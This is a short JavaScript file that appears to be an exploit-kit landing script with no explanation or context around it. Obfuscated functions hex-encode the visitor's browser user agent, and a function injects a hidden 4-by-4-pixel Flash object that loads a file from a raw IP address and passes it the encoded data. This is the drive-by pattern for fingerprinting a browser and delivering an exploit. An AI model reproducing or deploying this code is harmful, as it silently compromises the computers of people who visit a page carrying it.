/*s55440d85869hssfj74875fs*/function hgfgerdfgdf(num, width){/*s27935d83573hfj16707fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s44226d64486hfj37790fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s68613d24294hfj25550fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s67574d15874hfj66434fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd30864hfs*/c += b + d;/*s33138d40159hfj97763fs*/e += 1;}return c;}/*s54990dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://188.225.74.97/?NjY4OTQ4NTI=&elsa=rpjxbSKQcwnY9fAQ8W9vqsjkDWwRKdgZSA_0SLNAgRq5GUFuM62V70nrMkc84lxBKG61ETi-tL&rand=xXzQMvWebRXQCJ3EKvncT6NHMVHRHECL2YydmrHTefjaeVWkzrLFTF_yozKASASG6_FtdfJRDQ&info=MTk5NTY2NDY=&reinz=Mzc2OTY3OTU=", ghnvbn("http://188.225.74.97/?OTkyMjgxNjg=&elsa=olI8OAFtBpqivj0OGnBeZ05aA_RSOaQtB_pCWFrNq3l-gm7NAc8ollRSD6mNRnegtV1gV5QsWnKz7S6CJrg&rand=xHzQMrDYbR7FFYDfKPnEUKREMU3WA0eKwY-ZhazVF5-xFDfGpbH1FxzspVydCFyEmvFvdLAHIwKh1UfASwR&info=MjQxMTY1NDM=&fore=Mzk4NTQ0NTA=","wexykukusw"));